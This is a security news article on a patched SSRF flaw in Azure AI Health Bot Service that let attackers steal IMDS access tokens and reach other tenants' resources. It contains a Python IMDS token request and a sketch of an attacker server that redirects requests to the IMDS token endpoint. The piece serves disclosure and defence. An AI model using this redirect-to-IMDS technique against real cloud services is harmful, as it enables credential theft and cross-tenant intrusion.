Multiple privilege escalation issues in the Microsoft Azure cloud-based Health Bot service opened the platform to server-side request forgery (SSRF) and could have allowed access to cross-tenant resources.
While the vulnerabilities identified by Tenable Research were quickly patched by Microsoft, they underscore the inherent risks that chatbots can pose, the researchers warned.
Azure AI Health Bot Service enables healthcare organizations to build their own virtual health assistants to interact with patients and manage administrative workloads. Because those assistants can integrate with virtually any internal process or data source, the chatbots may have privileged access to highly sensitive health information.
“The risk to customers of a healthbot service depends entirely on the information they provide to the service,” says Jimi Sebree, senior staff research engineer at Tenable.
Azure Chatbots and Cross-Tenant Access
If a malicious actor exploited these issues, they could be granted administrative access to hundreds of resources belonging to other Azure customers, Tenable warned.
According to a blog post published today, the bugs allowed the researchers to reach the service's Instance Metadata Service (IMDS) and subsequently obtain access tokens that enable the management of resources across tenants.
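For context, Azure's IMDS listens on the link-local address 169.254.169.254 and is normally reachable only from inside a compute instance. The minimal sketch below shows the kind of documented token request IMDS serves; it assumes it runs on an Azure resource with a managed identity and illustrates the general IMDS API rather than Tenable's actual proof of concept:

```python
import json
import urllib.request

# Azure IMDS is only reachable from inside an Azure compute instance at
# this link-local address; it is not routable from the public internet.
IMDS_TOKEN_URL = (
    "http://169.254.169.254/metadata/identity/oauth2/token"
    "?api-version=2018-02-01"
    "&resource=https://management.azure.com/"
)

# IMDS requires the "Metadata: true" header as a basic SSRF safeguard,
# since naive SSRF primitives often cannot set custom request headers.
req = urllib.request.Request(IMDS_TOKEN_URL, headers={"Metadata": "true"})

with urllib.request.urlopen(req) as resp:
    token = json.load(resp)

# The access_token field is a bearer token for the Azure management
# plane; leaking it is what makes an IMDS-directed SSRF so damaging.
print(token["access_token"][:40], "...")
```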
“Based on the level of access granted, lateral movement to other resources within the customer environment was likely possible,” Sebree said. “This is common with cloud services like this, and there are safeguards in place to prevent cross-tenant access. The vulnerability discovered by Tenable Research essentially circumvents those safeguards.”
Researchers found that the issue affected endpoints within the Data Connectivity feature, which allows developers to integrate external APIs; the affected endpoints included those supporting the Fast Healthcare Interoperability Resources (FHIR) data exchange format.
Simply put, the attack involved configuring data connections to a malicious external host that answered the platform's queries with 301 (Moved Permanently) or 302 (Found) redirect status codes. The redirects pointed the platform's follow-up requests at the IMDS, which responded with metadata that leaked an access token.
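To make that concrete, a hypothetical attacker-controlled host of the kind described could be as simple as a web server that answers every data-connection query with a redirect to the IMDS token endpoint. The sketch below is illustrative only, not Tenable's actual exploit:

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

# Hypothetical sketch of the "malicious external host" described above:
# instead of returning data, it redirects the platform's data-connection
# request toward the internal IMDS token endpoint.
IMDS_TOKEN_URL = (
    "http://169.254.169.254/metadata/identity/oauth2/token"
    "?api-version=2018-02-01&resource=https://management.azure.com/"
)

class RedirectToIMDS(BaseHTTPRequestHandler):
    def do_GET(self):
        # 302 Found: a client that follows this redirect re-issues the
        # request against the IMDS URL from *inside* Azure, where the
        # link-local address is actually reachable.
        self.send_response(302)
        self.send_header("Location", IMDS_TOKEN_URL)
        self.end_headers()

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), RedirectToIMDS).serve_forever()
```

A hardened backend would refuse to follow redirects that resolve to link-local or otherwise internal addresses; per the researchers' description, the Health Bot platform followed them, so the redirected requests reached the IMDS from inside Azure's network.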
“These issues were easy to exploit and required no prior knowledge beyond typical usage of the Health Bot service,” Sebree said.
Rushing AI Development Is Dangerous
Sebree also explained that the vulnerabilities detailed in Tenable's analysis of the Health Bot service demonstrate the risks posed by the rushed development and deployment cycle of these interactive services.
“Companies need to prioritize not being first to market, but taking the time to ensure the security of their products and the security of their customers,” Sebree said.
According to a blog post from Tenable, “This vulnerability raises concerns that chatbots could be exploited to leak sensitive information. Notably, this vulnerability pertains to flaws in the underlying architecture of chatbot services, highlighting the importance of traditional web app and cloud security in the era of AI chatbots.”
This is especially important given that the global healthcare industry, which is undergoing a transformative wave of digitalization and adoption of AI-powered applications, is a constant target for cybercriminals because of the extremely valuable personal information contained in health records.
Fortunately, efforts are underway to strengthen healthcare security in a variety of areas, including cloud and AI. In May, the US Advanced Research Projects Agency for Health (ARPA-H) announced it would invest $50 million in its UPGRADE program to strengthen healthcare cybersecurity through automation, allowing healthcare providers to better focus on patient care.
Healthcare providers and medical device manufacturers are also encouraged to work more closely together to improve data security across medical devices.